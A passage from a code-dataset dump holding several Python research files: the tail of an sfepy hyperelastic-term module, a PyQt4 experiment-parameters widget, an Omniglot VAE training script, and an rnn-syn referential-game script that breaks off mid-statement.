cache(['detF', 'invF'],\n self, 0, state=state, data_shape=self.data_shape)\n\n bf = ap.get_base(sd.bkey, 0, self.integral)\n\n assert_(trac_qp.shape[2] == trac_qp.shape[3] == dim)\n\n return (trac_qp, detF, invF, bf, sg, sd.fis), shape, mode\n\n def needs_local_chunk(self):\n return True, False\n","sub_path":"sfepy/terms/terms_hyperelastic_tl.py","file_name":"terms_hyperelastic_tl.py","file_ext":"py","file_size_in_byte":14448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"173744334","text":"from PyQt4 import QtGui, QtCore\nfrom experimentgrid import ExperimentGrid\nfrom globalgrid import GlobalGrid\nfrom parametergrid import ParameterGrid\nfrom parameterlimitswindow import ParameterLimitsWindow\n\nclass ParametersWidget(QtGui.QWidget):\n def __init__(self, parent):\n QtGui.QWidget.__init__(self)\n self.parent = parent\n #set up layout\n self.mainLayout = QtGui.QVBoxLayout()\n font = QtGui.QFont('MS Shell Dlg 2',pointSize=14)\n font.setUnderline(True)\n self.experimentParametersLabel = QtGui.QLabel('Experiment Parameters')\n self.experimentParametersLabel.setFont(font)\n self.globalParametersLabel = QtGui.QLabel('Global Parameters')\n self.globalParametersLabel.setFont(font) \n #experiment parameters and global parameters\n self.widgetsLayout = QtGui.QHBoxLayout()\n self.miscLayout = QtGui.QHBoxLayout()\n self.experimentGridLayout = QtGui.QVBoxLayout()\n self.globalGridLayout = QtGui.QVBoxLayout() \n self.widgetsLayout.addLayout(self.experimentGridLayout)\n self.widgetsLayout.addLayout(self.globalGridLayout)\n #parameter limits button\n parameterLimitsButton = QtGui.QPushButton(\"Parameter Limits\", self)\n parameterLimitsButton.setGeometry(QtCore.QRect(0, 0, 30, 30))\n parameterLimitsButton.clicked.connect(self.parameterLimitsWindowEvent)\n self.miscLayout.addWidget(parameterLimitsButton)\n #create main layout and show\n self.mainLayout.addLayout(self.widgetsLayout)\n self.mainLayout.addLayout(self.miscLayout)\n self.setLayout(self.mainLayout)\n self.show()\n\n def setContexts(self, experimentContext, globalContext):\n self.experimentContext = experimentContext\n self.globalContext = globalContext\n #MR should not be hard coded\n self.setupExperimentGrid(['Wire', 'WireVoltageModulation'])\n self.setupGlobalGrid(['Wire', 'WireVoltageModulation']) \n\n def setupExperimentGrid(self, experimentPath):\n# try:\n# self.experimentGrid.setupExperimentGrid(experimentPath, self.experimentContext)\n# self.experimentGridLayout.addWidget(self.experimentParametersLabel)\n# 
self.experimentGridLayout.setAlignment(self.experimentParametersLabel, QtCore.Qt.AlignCenter)\n# self.experimentGridLayout.setStretchFactor(self.experimentParametersLabel, 0)\n# self.experimentGridLayout.addWidget(self.experimentGrid)\n## self.experimentGrid.disconnectSignal()\n## self.experimentGrid.hide()\n## del self.experimentGrid\n# except:\n# # First time\n########################################### working!\n# self.experimentGrid = ExperimentGrid(self, experimentPath, self.experimentContext)\n# self.experimentGridLayout.addWidget(self.experimentParametersLabel)\n# self.experimentGridLayout.setAlignment(self.experimentParametersLabel, QtCore.Qt.AlignCenter)\n# self.experimentGridLayout.setStretchFactor(self.experimentParametersLabel, 0)\n# self.experimentGridLayout.addWidget(self.experimentGrid) \n# self.setupExperimentGrid = self.setupExperimentGridSubsequent\n########################################### working!\n self.experimentGrid = ParameterGrid(self, experimentPath, self.experimentContext)\n self.experimentGridLayout.addWidget(self.experimentParametersLabel)\n self.experimentGridLayout.setAlignment(self.experimentParametersLabel, QtCore.Qt.AlignCenter)\n self.experimentGridLayout.setStretchFactor(self.experimentParametersLabel, 0)\n self.experimentGridLayout.addWidget(self.experimentGrid) \n self.setupExperimentGrid = self.setupExperimentGridSubsequent\n\n\n self.experimentGrid.show() \n\n def setupExperimentGridSubsequent(self, experimentPath):\n self.experimentGrid.setupParameterGrid(experimentPath)\n \n\n def setupGlobalGrid(self, experimentPath):\n########################################## working \n# self.globalGrid = GlobalGrid(self, experimentPath, self.globalContext)\n# self.globalGridLayout.addWidget(self.globalParametersLabel)\n# self.globalGridLayout.setAlignment(self.globalParametersLabel, QtCore.Qt.AlignCenter)\n# self.globalGridLayout.setStretchFactor(self.globalParametersLabel, 0)\n# self.globalGridLayout.addWidget(self.globalGrid)\n########################################## working \n\n self.globalGrid = ParameterGrid(self, experimentPath, self.globalContext, True)\n self.globalGridLayout.addWidget(self.globalParametersLabel)\n self.globalGridLayout.setAlignment(self.globalParametersLabel, QtCore.Qt.AlignCenter)\n self.globalGridLayout.setStretchFactor(self.globalParametersLabel, 0)\n self.globalGridLayout.addWidget(self.globalGrid)\n\n \n# self.globalGrid.disconnectSignal()\n# self.globalGrid.hide()\n# del self.globalGrid\n\n # First time\n\n# self.globalGrid.show() \n self.setupGlobalGrid = self.setupGlobalGridSubsequent \n \n def setupGlobalGridSubsequent(self, experimentPath):\n self.globalGrid.setupParameterGrid(experimentPath) \n \n def parameterLimitsWindowEvent(self, evt):\n experimentPath = self.experimentGrid.experimentPath\n try:\n self.parameterLimitsWindow.hide()\n del self.parameterLimitsWindow\n self.parameterLimitsWindow = ParameterLimitsWindow(self, experimentPath)\n self.parameterLimitsWindow.show()\n except:\n # first time\n self.parameterLimitsWindow = ParameterLimitsWindow(self, experimentPath)\n self.parameterLimitsWindow.show() \n","sub_path":"clients/guiscriptcontrol/parameterswidget.py","file_name":"parameterswidget.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"134215569","text":"#!/usr/bin/env python\n\n\nfrom __future__ import division\n\nimport os\nimport sys\nsys.path.append(\"../\")\n\nimport logging\nimport coloredlogs\nfrom time 
import time\n\nimport numpy as np\n\nlogger = logging.getLogger()\n\n\ndef run_experiment(args):\n # set environment variable for theano\n os.environ['THEANO_FLAGS'] = \"device=gpu\" + str(args.gpu)\n\n from learning.experiment import Experiment\n from learning.training import DSGNHTTrainer\n from learning.termination import EarlyStopping\n from learning.monitor import MonitorLL, DLogModelParams, SampleFromP, MonitorPosteriorMean\n from learning.dataset import Omniglot\n from learning.preproc import PermuteColumns, Binarize\n\n from learning.models.dgm_vae import VAEDGMLayerStack\n from learning.models.vae import VAE, StandardVAETop\n\n np.set_printoptions(precision=2)\n\n logger.debug(\"Arguments %s\" % args)\n tags = []\n\n np.random.seed(23)\n\n # n_samples to evaluate model\n n_samples_epoch = [1, 5, 25, 100]\n n_samples_final = [1, 5, 10, 25, 100, 500, 1000, 5000]\n\n # no. posterior samples for posterior mean\n postsamples = [int(s) for s in args.postsamples.split(\",\")]\n\n n_X = 28*28\n\n p_layers = []\n q_layers = []\n\n model = None\n\n # build the variational auto-encoder layer stack\n if args.layers == 1:\n latent_units = [50]\n hidden_units_q = [[200, 200]]\n hidden_units_p = [[200, 200]]\n\n n_Y = latent_units[0]\n p_layers.append(\n VAE(n_X=n_X, n_Y=n_Y, det_units=hidden_units_p[0], data_type=\"binary\", bias=None))\n p_layers.append(StandardVAETop(n_X=n_Y))\n q_layers.append(\n VAE(n_X=n_Y, n_Y=n_X, det_units=hidden_units_q[0], data_type=\"continuous\", bias=None))\n model = VAEDGMLayerStack(\n p_layers=p_layers,\n q_layers=q_layers,\n )\n model.setup()\n elif args.layers == 2:\n latent_units = [100, 50]\n hidden_units_p = [[200, 200], [100, 100]]\n hidden_units_q = [[100, 100], [200, 200]]\n\n n_Y = latent_units[0]\n p_layers.append(\n VAE(n_X=n_X, n_Y=latent_units[0], det_units=hidden_units_p[0], data_type=\"binary\", bias=None))\n q_layers.append(\n VAE(n_X=latent_units[0], n_Y=n_X, det_units=hidden_units_q[1], data_type=\"continuous\", bias=None))\n p_layers.append(\n VAE(n_X=latent_units[0], n_Y=latent_units[1], det_units=hidden_units_p[1], data_type=\"continuous\", bias=None))\n q_layers.append(\n VAE(n_X=latent_units[1], n_Y=latent_units[0], det_units=hidden_units_q[0], data_type=\"continuous\", bias=None))\n\n p_layers.append(StandardVAETop(n_X=latent_units[1]))\n model = VAEDGMLayerStack(\n p_layers=p_layers,\n q_layers=q_layers,\n )\n model.setup()\n\n assert model is not None\n\n # parameters\n def param_tag(value):\n \"\"\" Convert a float into a short tag-usable string representation. 
E.g.:\n 0.1 -> 11\n 0.01 -> 12\n 0.001 -> 13\n 0.005 -> 53\n \"\"\"\n if value == 0.0:\n return \"00\"\n exp = np.floor(np.log10(value))\n leading = (\"%e\"%value)[0]\n return \"%s%d\" % (leading, -exp)\n\n # Learning rate\n lr_p = args.lr_p\n tags += [\"lp\"+param_tag(lr_p)]\n lr_q = args.lr_q\n tags += [\"lq\"+param_tag(lr_q)]\n\n # LR decay\n if args.lrdecay != 1.0:\n tags += [\"lrdecay\"+param_tag(args.lrdecay-1.)]\n\n # Samples\n n_samples = args.samples\n tags += [\"spl%d\"%n_samples]\n\n # Batch size\n batch_size = args.batchsize\n tags += [\"bs%d\"%batch_size]\n\n # n_steps_simu\n n_steps_simu = args.n_simu\n tags += [\"ns%d\"%n_steps_simu]\n\n # n_steps_optm\n n_steps_optm = args.n_optm\n tags += [\"no%d\"%n_steps_optm]\n\n # momentum_decay\n momentum_decay = args.momentum_decay\n tags += [\"md\"+param_tag(momentum_decay)]\n\n # Dataset\n if args.shuffle:\n np.random.seed(23)\n preproc = [PermuteColumns()]\n tags += [\"shuffle\"]\n else:\n preproc = []\n\n binarize_preproc = preproc + [Binarize(late=True)]\n dataset = Omniglot(which_set='train', preproc=binarize_preproc)\n valiset = Omniglot(which_set='valid', preproc=binarize_preproc)\n testset = Omniglot(which_set='test', preproc=binarize_preproc)\n\n # lookahead\n lookahead = args.lookahead\n tags += [\"lah%d\" % lookahead]\n\n tags.sort()\n expname = \"dsgnht-%s-%slayer\"% (\"-\".join(tags), str(args.layers))\n\n if args.report:\n expname = \"report/\" + expname\n\n logger.info(\"Running %s\" % expname)\n\n\n#-----------------------------------------------------------------------------\n\n dlog_model_params_monitor = DLogModelParams()\n generate_data_monitor = SampleFromP(n_samples=100)\n\n trainer = DSGNHTTrainer(\n batch_size=batch_size,\n n_samples=n_samples,\n n_steps_simu=n_steps_simu,\n n_steps_optm=n_steps_optm,\n learning_rate_p=lr_p,\n learning_rate_q=lr_q,\n lr_decay=args.lrdecay,\n momentum_decay=momentum_decay,\n dataset=dataset,\n model=model,\n termination=EarlyStopping(lookahead=lookahead, min_epochs=10, max_epochs=999999),\n epoch_monitors=[\n dlog_model_params_monitor,\n generate_data_monitor,\n MonitorLL(name=\"valiset\", data=valiset, n_samples=n_samples_epoch),\n ],\n final_monitors=[\n dlog_model_params_monitor,\n generate_data_monitor,\n MonitorLL(name=\"final-testset\", data=testset, n_samples=n_samples_final,\n level=logging.CRITICAL),\n ],\n posterior_mean_samples=postsamples,\n posterior_mean_monitor=MonitorPosteriorMean(),\n )\n\n experiment = Experiment()\n experiment.set_trainer(trainer)\n experiment.setup_output_dir(expname)\n experiment.setup_logging()\n experiment.print_summary()\n\n if args.cont is None:\n logger.info(\"Starting experiment ...\")\n experiment.run_experiment()\n else:\n logger.info(\"Continuing experiment %s ....\" % args.cont)\n experiment.continue_experiment(args.cont+\"/results.h5\", row=-1)\n\n logger.info(\"Finished. Writing metadata\")\n\n experiment.print_summary()\n\n#=============================================================================\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--report', default=False, action=\"store_true\",\n help=\"Store results in report folder. (default: False)\")\n\n parser.add_argument('--shuffle', default=False, action='store_true',\n help=\"Shuffle the data. (default: False)\")\n\n parser.add_argument('--cont', nargs='?', default=None,\n help=\"Continue a previous experiment in result_dir\")\n\n parser.add_argument('--gpu', default=0, type=int,\n help=\"ID of gpu device to use. 
(default: 0)\")\n\n parser.add_argument('--samples', default=5, type=int,\n help=\"Number of training samples. (default: 5)\")\n\n parser.add_argument('--batchsize', default=100, type=int,\n help=\"Mini batch size. (default: 100)\")\n\n parser.add_argument('--n_simu', default=10, type=int,\n help=\"No. steps used during simulating the dynamics. (default: 10)\")\n\n parser.add_argument('--n_optm', default=1, type=int,\n help=\"No. steps used during optimizing the recognition model. (default: 1)\")\n\n parser.add_argument('--lr_p', default=0.002, type=float,\n help=\"Per-batch learning rate of DSGNHT. (default: 0.002)\")\n\n parser.add_argument('--lr_q', default=0.0001, type=float,\n help=\"Step size of Adam. (default: 0.0001)\")\n\n parser.add_argument('--lrdecay', default=1., type=float,\n help=\"Learning rate decay. (default: 1.0)\")\n\n parser.add_argument('--momentum_decay', default=0.1, type=float,\n help=\"Momentum decay of DSGNHT. (default: 0.1)\")\n\n parser.add_argument('--lookahead', default=20, type=int,\n help=\"Termination criteria: # epochs without LL increase. (default: 20)\")\n\n parser.add_argument('--postsamples', default=\"1,5,10,20,50,100,200\", type=str,\n help=\"# samples for computing posterior mean. (default: 1,5,10,20,50,100,200)\")\n\n parser.add_argument('--layers', default=1, type=int,\n help=\"# of stochastic layers. (default: 1)\")\n\n args = parser.parse_args()\n\n FORMAT = '[%(asctime)s] %(name)-15s %(message)s'\n DATEFMT = '%H:%M:%S'\n LEVEL_STYLES = dict(\n debug=dict(color='green'),\n info=dict(),\n verbose=dict(color='blue'),\n warning=dict(color='yellow'),\n error=dict(color='red'),\n critical=dict(color='magenta'))\n\n coloredlogs.install(level='INFO',fmt=FORMAT, datefmt=DATEFMT, level_styles=LEVEL_STYLES)\n\n run_experiment(args)\n\n","sub_path":"omniglot-vae/run-dsgnht-omniglot-vae.py","file_name":"run-dsgnht-omniglot-vae.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"164610342","text":"\"\"\"\nRun rnn-syn experiments.\n\nTODO: Maybe variation in number of images is a big confounding factor in\nmessages...could just keep that constant!\n\"\"\"\n\nimport net\nimport tensorflow as tf\nimport numpy as np\nimport swdata\nfrom swdata import (AsymScene, Scene, SWorld, TrainEx, load_components,\n make_from_components)\nimport sys\nimport os\nfrom tensorflow.python import debug as tf_debug\nimport pandas as pd\nimport itertools\nimport gc\nfrom scipy.misc import imsave\n\nRNN_CELLS = {\n 'gru': tf.contrib.rnn.GRUCell,\n 'lstm': tf.contrib.rnn.LSTMCell,\n}\n\nassert AsymScene\nassert Scene\nassert SWorld\nassert TrainEx\n\n\ndef add_weights(configs, w=10):\n \"\"\"Add weight to config if colors are same\"\"\"\n # Add weights to configs. 
Specifically make 10x as likely\n return [\n (c, w if c[0][1] == c[1][1] else 1) for c in configs\n ]\n\n\ndef mkconfig(a, b, n=1000):\n # Just sorts them in order so we can reliably identify the config.\n return '{}-{}-{}'.format(n, *sorted([a, b]))\n\n\ndef mkconfigs(arr, n=1000):\n return [mkconfig(a, b, n=n) for a, b in itertools.combinations(arr, 2)]\n\n\nCONFIGS = {\n # Generalization to new color/shape pair (triangle + red)\n # After seeing 2 colors and shapes\n 'shape_color_generalization_1': {\n 'train': [\n mkconfig('square-blue', 'square-red'),\n mkconfig('square-blue', 'triangle-blue'),\n mkconfig('square-red', 'triangle-blue')\n ],\n 'test': [\n mkconfig('square-blue', 'triangle-red'),\n mkconfig('square-red', 'triangle-red'),\n mkconfig('triangle-blue', 'triangle-red')\n ]\n },\n # Generalization to new color/shape pair\n # After seeing 3 colors and 2 shapes\n 'shape_color_generalization_2': {\n 'train':\n mkconfigs([\n 'square-blue', 'square-red', 'triangle-blue', 'square-green',\n 'triangle-green'\n ]),\n 'test': [\n mkconfig('triangle-red', b) for b in [\n 'square-blue', 'square-red', 'triangle-blue', 'square-green',\n 'triangle-green'\n ]\n ]\n },\n # After seeing 3 colors and 3 shapes, importantly: trained on red\n 'shape_color_generalization_3': {\n 'train':\n mkconfigs([\n 'square-red', 'square-blue', 'square-green',\n 'triangle-blue', 'triangle-green',\n 'circle-red', 'circle-blue', 'circle-green'\n ]),\n 'test': [\n mkconfig('triangle-red', b) for b in [\n 'square-red', 'square-blue', 'square-green',\n 'triangle-blue', 'triangle-green',\n 'circle-red', 'circle-blue', 'circle-green'\n ]\n ]\n },\n 'shape_color_generalization_4': {\n 'train':\n mkconfigs([\n 'square-red', 'square-blue', 'square-green',\n 'triangle-blue', 'triangle-green',\n 'circle-red', 'circle-blue', 'circle-green',\n 'cross-red', 'cross-blue', 'cross-green',\n ]),\n 'test': [\n mkconfig('triangle-red', b) for b in [\n 'square-red', 'square-blue', 'square-green',\n 'triangle-blue', 'triangle-green',\n 'circle-red', 'circle-blue', 'circle-green',\n 'cross-red', 'cross-blue', 'cross-green',\n ]\n ]\n },\n 'colors_only': {\n 'train': [mkconfig('{}-{}'.format(s1, color), '{}-{}'.format(s2, color))\n for color in swdata.COLORS\n for s1, s2 in itertools.combinations(['square', 'triangle', 'circle', 'cross'], 2)],\n 'test': [mkconfig('{}-{}'.format(s1, color), '{}-{}'.format(s2, color))\n for color in swdata.COLORS\n for s1, s2 in itertools.combinations(['square', 'triangle', 'circle', 'cross'], 2)],\n },\n 'shape_color_generalization_5': {\n 'train':\n mkconfigs([\n 'square-red', 'square-blue', 'square-green',\n 'square-cyan', 'square-yellow', 'square-magenta',\n 'triangle-blue', 'triangle-green', # 'triangle-red',\n 'triangle-cyan', 'triangle-yellow', 'triangle-magenta',\n 'circle-red', 'circle-blue', 'circle-green',\n 'circle-cyan', 'circle-yellow', 'circle-magenta',\n 'cross-red', 'cross-blue', 'cross-green',\n 'cross-cyan', 'cross-yellow', 'cross-magenta',\n ]),\n 'test': [\n mkconfig('triangle-red', b) for b in [\n 'square-red', 'square-blue', 'square-green',\n 'square-cyan', 'square-yellow', 'square-magenta',\n 'triangle-blue', 'triangle-green',\n 'triangle-cyan', 'triangle-yellow', 'triangle-magenta',\n 'circle-red', 'circle-blue', 'circle-green',\n 'circle-cyan', 'circle-yellow', 'circle-magenta',\n 'cross-red', 'cross-blue', 'cross-green',\n 'cross-cyan', 'cross-yellow', 'cross-magenta',\n ]\n ]\n },\n 'standard': {\n 'train':\n mkconfigs([\n 'square-red', 'square-blue', 'square-green',\n 
'square-cyan', 'square-yellow', 'square-magenta',\n 'triangle-blue', 'triangle-green', 'triangle-red',\n 'triangle-cyan', 'triangle-yellow', 'triangle-magenta',\n 'circle-red', 'circle-blue', 'circle-green',\n 'circle-cyan', 'circle-yellow', 'circle-magenta',\n 'cross-red', 'cross-blue', 'cross-green',\n 'cross-cyan', 'cross-yellow', 'cross-magenta',\n ]),\n },\n # Generalization to new pair (does it with 100% accuracy, meaning messages encode target/referent)\n 'new_pair_generalization_1': {\n 'train': [\n mkconfig('square-blue', 'square-red'),\n mkconfig('square-red', 'triangle-blue')\n ],\n 'test': [mkconfig('square-blue', 'triangle-blue')]\n }\n}\n\n\ndef find_true_example(envslabels):\n envs, labels = envslabels\n for env, label in zip(envs, labels):\n if label == 1.0:\n return env\n raise RuntimeError(\"Couldn't find a True label\")\n\n\ndef build_feature_model(n_images,\n max_shapes,\n n_attrs,\n net_arch=(256, 64),\n discrete=False,\n rnncell=tf.contrib.rnn.GRUCell,\n asym=False):\n \"\"\"\n Return an encoder-decoder model that uses the raw feature representation\n of ShapeWorld microworlds for communication. This is exactly the model used\n in Andreas and Klein (2017).\n \"\"\"\n n_hidden, n_comm = net_arch\n\n # Each image represented as a max_shapes * n_attrs array\n n_image_features = max_shapes * n_attrs\n t_features = tf.placeholder(tf.float32, (None, n_images, n_image_features))\n\n # Whether an image is the target\n t_labels = tf.placeholder(tf.float32, (None, n_images))\n\n if asym:\n # Listener sees separate labels and features\n t_features_l = tf.placeholder(tf.float32,\n (None, n_images, n_image_features))\n t_labels_l = tf.placeholder(tf.float32, (None, n_images))\n\n # Encoder observes both object features and target labels\n t_labels_exp = tf.expand_dims(t_labels, axis=2)\n t_in = tf.concat((t_features, t_labels_exp), axis=2)\n\n if rnncell == tf.contrib.rnn.LSTMCell:\n cell = rnncell(n_hidden, state_is_tuple=False)\n else:\n cell = rnncell(n_hidden)\n with tf.variable_scope(\"enc1\"):\n states1, hidden1 = tf.nn.dynamic_rnn(cell, t_in, dtype=tf.float32)\n t_hidden = hidden1\n t_msg = tf.nn.relu(net.linear(t_hidden, n_comm, 'linear_speaker'))\n if discrete:\n t_msg_discrete = tf.one_hot(\n tf.argmax(t_msg, axis=1), depth=n_comm, name='discretize')\n\n # Decoder makes independent predictions for each set of object features\n t_expand_msg = tf.expand_dims(\n t_msg_discrete if discrete else t_msg, axis=1)\n t_tile_message = tf.tile(t_expand_msg, (1, n_images, 1))\n\n if asym: # Encode listener features\n t_out_feats = tf.concat((t_tile_message, t_features_l), axis=2)\n else:\n t_out_feats = tf.concat((t_tile_message, t_features), axis=2)\n\n t_pred = tf.squeeze(\n net.mlp(t_out_feats, (n_hidden, 1), (tf.nn.relu, None)))\n\n if asym: # Loss wrt listener labels\n t_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n labels=t_labels_l, logits=t_pred))\n return (t_features, t_labels, t_features_l, t_labels_l,\n (t_msg_discrete if discrete else t_msg), t_pred, t_loss)\n else:\n t_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n labels=t_labels, logits=t_pred))\n return (t_features, t_labels, (t_msg_discrete\n if discrete else t_msg), t_pred, t_loss)\n\n\ndef build_end2end_model(n_images,\n image_dim=(64, 64, 3),\n net_arch=(256, 64, 1024),\n discrete=False,\n rnncell=tf.contrib.rnn.GRUCell,\n asym=False):\n \"\"\"\n Return an encoder-decoder model that uses raw ShapeWorld images\n\n net_arch:\n (number of GRU hidden units, message 
dimensionality,\n convnet toplevel layer dimensionality)\n\n discrete:\n Discretize by one-hot encoding the message. Then message\n dimensionality arg of net_arch encodes vocabulary size\n \"\"\"\n n_hidden, n_comm, n_toplevel_conv = net_arch\n\n # The raw image representation, of shape n_images * image_dim\n t_features_raw = tf.placeholder(\n tf.float32, (None, n_images) + image_dim, name='features_speaker')\n\n t_features_toplevel_enc = net.convolve(t_features_raw, n_images,\n n_toplevel_conv, 'conv_speaker')\n\n # Whether an image is the target\n t_labels = tf.placeholder(\n tf.float32, (None, n_images), name='labels_speaker')\n\n if asym:\n # Listener observes own features/labels\n t_features_raw_l = tf.placeholder(\n tf.float32, (None, n_images) + image_dim, name='features_listener')\n t_labels_l = tf.placeholder(\n tf.float32, (None, n_images), name='labels_listener')\n\n # Encoder observes both object features and target labels\n t_labels_exp = tf.expand_dims(t_labels, axis=2)\n t_in = tf.concat(\n (t_features_toplevel_enc, t_labels_exp), axis=2, name='input_speaker')\n\n if rnncell == tf.contrib.rnn.LSTMCell:\n cell = rnncell(n_hidden, state_is_tuple=False)\n else:\n cell = rnncell(n_hidden)\n with tf.variable_scope(\"enc1\"):\n states1, hidden1 = tf.nn.dynamic_rnn(cell, t_in, dtype=tf.float32)\n t_hidden = hidden1\n t_msg = tf.nn.relu(\n net.linear(t_hidden, n_comm, 'linear_speaker'), name='message')\n\n if discrete:\n t_msg_discrete = tf.one_hot(\n tf.argmax(t_msg, axis=1), depth=n_comm, name='message_discrete')\n\n # Decoder makes independent predictions for each set of object features\n with tf.name_scope('message_process'):\n t_expand_msg = tf.expand_dims(\n t_msg_discrete if discrete else t_msg, axis=1)\n t_tile_message = tf.tile(t_expand_msg, (1, n_images, 1))\n\n if asym:\n t_features_toplevel_dec = net.convolve(\n t_features_raw_l, n_images, n_toplevel_conv, 'conv_listener')\n else:\n t_features_toplevel_dec = net.convolve(\n t_features_raw, n_images, n_toplevel_conv, 'conv_listener')\n t_out_feats = tf.concat(\n (t_tile_message, t_features_toplevel_dec),\n axis=2,\n name='input_listener')\n t_pred = tf.squeeze(\n net.mlp(t_out_feats, (n_hidden, 1), (tf.nn.relu, None)),\n name='prediction')\n if asym:\n t_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n labels=t_labels_l, logits=t_pred),\n name='loss')\n return (t_features_raw, t_labels, t_features_raw_l, t_labels_l,\n (t_msg_discrete if discrete else t_msg), t_pred, t_loss,\n t_features_toplevel_enc, t_features_toplevel_dec)\n else:\n t_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(\n labels=t_labels, logits=t_pred))\n return (t_features_raw, t_labels, (t_msg_discrete if discrete else\n t_msg), t_pred, t_loss,\n t_features_toplevel_enc, t_features_toplevel_dec)\n\n\ndef batches(train, batch_size, max_data=None):\n \"\"\"\n Yield batches from `train`. 
Discards smallest batch sizes, like\n tf.train.Batch.\n \"\"\"\n if max_data is not None:\n # Truncate list and yield normally\n yield from batches(train[:max_data], batch_size, max_data=None)\n else:\n for i in range(0, len(train), batch_size):\n batch = train[i:i + batch_size]\n if len(batch) == batch_size:\n yield batch\n\n\nif __name__ == \"__main__\":\n from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\n\n parser = ArgumentParser(\n description='rnn-syn', formatter_class=ArgumentDefaultsHelpFormatter)\n\n parser.add_argument(\n '--model',\n type=str,\n choices=['feature', 'end2end'],\n default='end2end',\n help='Model type')\n\n parser.add_argument(\n '--debug', action='store_true', help='Use tensorflow debugger')\n\n data_opts = parser.add_argument_group('data', 'options for data gen')\n data_opts.add_argument(\n '--data',\n type=str,\n help='Folder of dataset to load (cannot be used with --components)')\n data_opts.add_argument(\n '--components',\n action='store_true',\n help='Generate dataset from components instead (cannot be used with '\n '--data')\n\n component_args = parser.add_argument_group(\n 'components',\n 'options for generating data from components (only supports asym now)')\n component_args.add_argument(\n '--train_components',\n nargs='+',\n default=CONFIGS['shape_color_generalization_5']['train'])\n component_args.add_argument(\n '--test_components',\n nargs='+',\n default=CONFIGS['shape_color_generalization_5']['test'])\n component_args.add_argument(\n '--n_dev', type=int, default=1024, help='Dev set size')\n component_args.add_argument(\n '--n_test',\n type=int,\n default=1024,\n help='Number of testing examples to create from components')\n\n component_args.add_argument(\n '--asym',\n action='store_true',\n help='Use asym worlds')\n component_args.add_argument(\n '--asym_max_images',\n default=5,\n type=int,\n help='Maximum images in each asymmetric world')\n component_args.add_argument(\n '--asym_min_targets',\n default=2,\n type=int,\n help='Minimum targets in each asymmetric world')\n component_args.add_argument(\n '--asym_min_distractors',\n default=1,\n type=int,\n help='Minimum distractors in each asymmetric world')\n\n net_opts = parser.add_argument_group('net', 'options for net architecture')\n net_opts.add_argument(\n '--n_hidden', type=int, default=256, help='GRUCell hidden layer size')\n net_opts.add_argument(\n '--n_comm', type=int, default=64, help='Communication layer size')\n net_opts.add_argument(\n '--n_conv', type=int, default=1024, help='top-layer convolution size (only for end2end)')\n net_opts.add_argument(\n '--comm_type',\n type=str,\n default='continuous',\n choices=['continuous', 'discrete'],\n help='Communication channel type')\n net_opts.add_argument(\n '--rnn_cell',\n type=str,\n default='gru',\n choices=['lstm', 'gru'],\n help='RNN Cell type')\n net_opts.add_argument(\n '--tensorboard',\n action='store_true',\n help='Save tensorboard graph, don\'t do anything else')\n net_opts.add_argument(\n '--tensorboard_messages',\n action='store_true',\n help='Save test (or train if not --test) messages for '\n 'tensorboard embedding visualization')\n net_opts.add_argument(\n '--tensorboard_save',\n default='./saves/tensorboard/rnn-syn-graph',\n help='Tensorboard graph save dir')\n\n train_opts = parser.add_argument_group('train', 'options for net training')\n train_opts.add_argument(\n '--restore', action='store_true', help='Restore model')\n train_opts.add_argument(\n '--restore_path',\n type=str,\n 
default='saves/{data}-{model}-model.model',\n help='Restore filepath (can use parser options)')\n train_opts.add_argument(\n '--save', action='store_true', help='Save model file')\n train_opts.add_argument(\n '--save_path',\n type=str,\n default='saves/{data}-{model}-model.ckpt',\n help='Save model filepath (can use parser options)')\n train_opts.add_argument(\n '--seed',\n type=int,\n default=None,\n help='Random seed (if none, picked randomly)')\n train_opts.add_argument(\n '--tf_seed',\n type=int,\n default=None,\n help='Random TensorFlow seed (by default, same as args.seed)')\n train_opts.add_argument(\n '--batch_size', type=int, default=128, help='Batch size')\n train_opts.add_argument(\n '--epochs', type=int, default=16, help='Number of training epochs')\n train_opts.add_argument(\n '--max_data',\n type=int,\n default=None,\n help='Max size of training data (rest discarded)')\n train_opts.add_argument(\n '--dev_every',\n type=int,\n default=10,\n help='How often (in epochs) to report dev results. '\n 'Only applies to components (for now)')\n\n test_opts = parser.add_argument_group('train', 'options for net testing')\n test_opts.add_argument('--test', action='store_true', help='do testing')\n test_opts.add_argument(\n '--test_split',\n type=float,\n default=0.2,\n help='%% of dataset to test on')\n test_opts.add_argument(\n '--test_no_unique',\n action='store_true',\n help='Don\'t require testing unique configs')\n\n save_opts = parser.add_argument_group('save messages')\n save_opts.add_argument(\n '--no_save_msgs',\n action='store_true',\n help='Don\'t save computed messages after testing')\n save_opts.add_argument(\n '--msgs_file',\n default='data/{data}-{model}-{comm_type}'\n '{n_comm}-{epochs}epochs-msgs.pkl',\n help='Save location (can use parser options)')\n save_opts.add_argument(\n '--save_max',\n type=int,\n default=None,\n help='Maximum number of messages to save')\n\n args = parser.parse_args()\n\n if args.components and args.data:\n parser.error(\"Can't specify --data and --components\")\n if not args.components and not args.data:\n parser.error(\"Must specify one of --data or --components\")\n\n if args.seed is not None:\n random = np.random.RandomState(args.seed)\n else:\n random = np.random.RandomState()\n\n if args.tf_seed is not None:\n tf.set_random_seed(args.tf_seed)\n elif args.seed is not None:\n tf.set_random_seed(args.seed)\n\n if args.components:\n if any(x in args.train_components for x in args.test_components):\n print(\"Warning: test components in train components, could be \"\n \"repeats depending on size of data\")\n # Hardcoded asym\n asym = True\n actually_asym = args.asym\n if asym:\n print(\"Generating from components (asym)\")\n else:\n raise NotImplementedError\n print(\"Loading training components\")\n configs, components_dict = load_components(args.train_components)\n # configs = add_weights(configs)\n # Generate metadata ourselves\n asym_args = {\n 'max_images': args.asym_max_images,\n 'min_targets': args.asym_min_targets,\n 'min_distractors': args.asym_min_distractors\n }\n train = 